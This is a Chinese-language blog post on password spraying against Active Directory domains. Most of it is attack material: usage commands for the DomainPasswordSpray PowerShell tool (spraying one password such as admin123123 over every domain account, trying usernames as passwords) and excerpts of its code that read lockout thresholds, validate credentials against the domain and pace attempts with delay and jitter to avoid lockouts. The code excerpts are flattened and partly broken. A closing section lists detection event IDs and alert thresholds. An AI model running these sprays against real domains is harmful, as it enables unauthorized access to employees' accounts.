0x01 什么是密码喷洒攻击？

通常情况下，穷举攻击是固定好用户名，利用多个密码尝试验证。与穷举攻击相反，密码喷洒攻击是固定好密码，尝试多个用户名进行验证，在域系统中，员工往往因为初始入域的密码未进行修改导致被攻击者采取密码喷洒的方式获取权限。

0x02 密码喷洒工具

下载地址：
DomainPasswordSpray

使用方法:
1.Invoke-DomainPasswordSpray -Password admin123123
2.Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile out.txt
3.Invoke-DomainPasswordSpray -UsernameAsPassword -OutFile out.txt

1.指定单用户密码的方式，默认自动枚举所有域内成员账号进行喷洒
2.同时指定用户和密码字典，结果保存到out.txt
3.枚举用户和密码相同的账号，结果保存到out.txt

实验环境测试如下：
# 使用-Domain参数获取域 $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext("domain",$Domain) $DomainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) $CurrentDomain = "LDAP://" + ([ADSI]"LDAP://$Domain").distinguishedName # 默认使用当前域 $DomainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $CurrentDomain = "LDAP://" + ([ADSI]"").distinguishedName catch Write-Host -ForegroundColor "red" "[*] Could not connect to the domain. Try specifying the domain name with the -Domain option." break

查询域密码属性策略函数

 # 查询域账号的锁定阈值
    $objDeDomain = [ADSI] "LDAP://$($DomainObject.PDCRoleOwner)"
    $AccountLockoutThresholds = @()
    $AccountLockoutThresholds += $objDeDomain.Properties.lockoutthreshold
    # 获取域控的属性判断是否可以抓取到密码策略
    $behaviorversion = [int] $objDeDomain.Properties['msds-behavior-version'].item(0)
    if ($behaviorversion -ge 3)
        Write-Host "[*] Current domain is compatible with Fine-Grained Password Policy."
        $ADSearcher = New-Object System.DirectoryServices.DirectorySearcher
        $ADSearcher.SearchRoot = $objDeDomain
        $ADSearcher.Filter = "(objectclass=msDS-PasswordSettings)"
        $PSOs = $ADSearcher.FindAll()
        if ( $PSOs.count -gt 0)
            Write-Host -foregroundcolor "yellow" ("[*] A total of " + $PSOs.count + " Fine-Grained Password policies were found.`r`n")
            foreach($entry in $PSOs)
                # 选择最小的密码锁定阈值
                $PSOFineGrainedPolicy = $entry | Select-Object -ExpandProperty Properties
                $PSOPolicyName = $PSOFineGrainedPolicy.name
                $PSOLockoutThreshold = $PSOFineGrainedPolicy.'msds-lockoutthreshold'
                $PSOAppliesTo = $PSOFineGrainedPolicy.'msds-psoappliesto'
                $PSOMinPwdLength = $PSOFineGrainedPolicy.'msds-minimumpasswordlength'
                $AccountLockoutThresholds += $PSOLockoutThreshold
                Write-Host "[*] Fine-Grained Password Policy titled: $PSOPolicyName has a Lockout Threshold of $PSOLockoutThreshold attempts, minimum password length of $PSOMinPwdLength chars, and applies to $PSOAppliesTo.`r`n"
    foreach ($User in $UserListArray)
        if ($UsernameAsPassword)
            $Password = $User
校验账号密码是否准确
        #利用AD服务验证账号密码能否访问
        $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain,$User,$Password)
        if ($Domain_check.name -ne $null)
            if ($OutFile -ne "")
                Add-Content $OutFile $User`:$Password
            Write-Host -ForegroundColor Green "[*] SUCCESS! User:$User Password:$Password"
        $curr_user += 1
        Write-Host -nonewline "$curr_user of $count users tested`r"
        if ($Delay)
            Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
0x04   检测？？？
**检测的主要方法包括：

1.启用适当的日志记录：

1.1域控制器：事件ID 4625的“审计登录”（成功与失败）。

1.2域控制器：事件ID 4771的“审计Kerberos验证服务”（成功与失败）。

1.3所有系统：事件ID 4648的“审计登录”（成功与失败）。

2.在1分钟内配置50 4625多个事件的警报。

3.在1分钟内为50 4771多个事件的警报的设置失败代码“0x18”。

4.在1分钟内为工作站上的100 4648多个事件配置警报。

5.根据以下命令，编写一个每天运行的PowerShell脚本并报告可能的密码喷洒：
get-aduser -filter * -prop lastbadpasswordattempt,badpwdcount | select name,lastbadpasswordattempt,badpwdcount | format-table –auto